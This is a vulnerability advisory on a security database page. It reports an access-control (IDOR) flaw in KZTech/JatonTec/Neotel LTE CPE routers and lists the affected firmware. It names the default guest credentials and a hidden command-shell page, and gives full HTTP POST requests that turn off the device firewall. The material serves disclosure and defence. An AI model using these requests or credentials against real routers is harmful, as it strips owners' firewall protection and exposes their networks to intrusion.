Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insecure Direct Object Reference

🗓️ 19 Mar 2021 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 295 Views

JT3500V 4G LTE CPE 2.0.1 IDOR vulnerabilit

Code
`  
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Improper Access Control (IDOR)  
  
  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk  
http://www.jatontec.com/products/show.php?itemid=258  
http://www.jatontech.com/CAT12.html#_pp=105_564  
http://www.kzbtech.com/AM3300V.html  
https://neotel.mk/ostanati-paketi-2/  
  
Affected version: Model | Firmware  
-------|---------  
JT3500V | 2.0.1B1064  
JT3300V | 2.0.1B1047  
AM6200M | 2.0.0B3210  
AM6000N | 2.0.0B3042  
AM5000W | 2.0.0B3037  
AM4200M | 2.0.0B2996  
AM4100V | 2.0.0B2988  
AM3500MW | 2.0.0B1092  
AM3410V | 2.0.0B1085  
AM3300V | 2.0.0B1060  
AM3100E | 2.0.0B981  
AM3100V | 2.0.0B946  
AM3000M | 2.0.0B21  
KZ7621U | 2.0.0B14  
KZ3220M | 2.0.0B04  
KZ3120R | 2.0.0B01  
  
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multi-media data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution to SOHO or residential customers. It can  
deliver up to 1Gbps max data throughput which can be very  
competitive to wired broadband access service.  
  
Desc: Insecure direct object references occur when an application  
provides direct access to objects based on user-supplied input. As  
a result of this vulnerability attackers can bypass authorization  
and access the hidden resources in the system and execute privileged  
functionalities.  
  
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5640  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5640.php  
  
  
03.02.2021  
  
--  
  
  
The guest account user:user123 can navigate to /system_firewall.html page  
and disable the firewall. The guest account can access any page directly  
and modify the device.  
  
Or navigate to the hidden /lte/cmdshell.html page and execute LTE protocol  
stack commands.  
  
Ref: https://cwe.mitre.org/data/definitions/732.html  
  
Disable the firewall IDOR (newer models):  
-----------------------------------------  
  
POST /goform/set_sys_firewall HTTP/1.1  
Host: 192.168.1.1  
Connection: keep-alive  
Content-Length: 167  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: https://192.168.1.1  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://192.168.1.1/system_firewall.html  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b  
  
enableFirewall: 0  
pingFrmWANFilterEnabled: 0  
blockPortScanEnabled: 0  
blockSynFloodEnabled: 0  
spiFWEnabled: 1  
ftp_alg_enable_val: 1  
pptp_alg_enable_val: 1  
sip_alg_enable_val: 1  
  
  
Disable the firewall IDOR (older models):  
-----------------------------------------  
  
POST /goform/websSysFirewall HTTP/1.1  
Host: 192.168.1.1  
Connection: keep-alive  
Content-Length: 167  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Origin: http://192.168.1.1  
Referer: http://192.168.1.1/system_firewall.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: kz_userid=admin:4540141  
  
enableFirewall: 0  
pingFrmWANFilterEnabled: 0  
blockPortScanEnabled: 0  
blockSynFloodEnabled: 0  
spiFWEnabled: 1  
ftp_alg_enable_val: 1  
pptp_alg_enable_val: 1  
sip_alg_enable_val: 1  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Mar 2021 00:00Current
7.4High risk
Vulners AI Score7.4
kztechjatontecneoteljt3500vinsecure direct object referencefirmwarevulnerability
295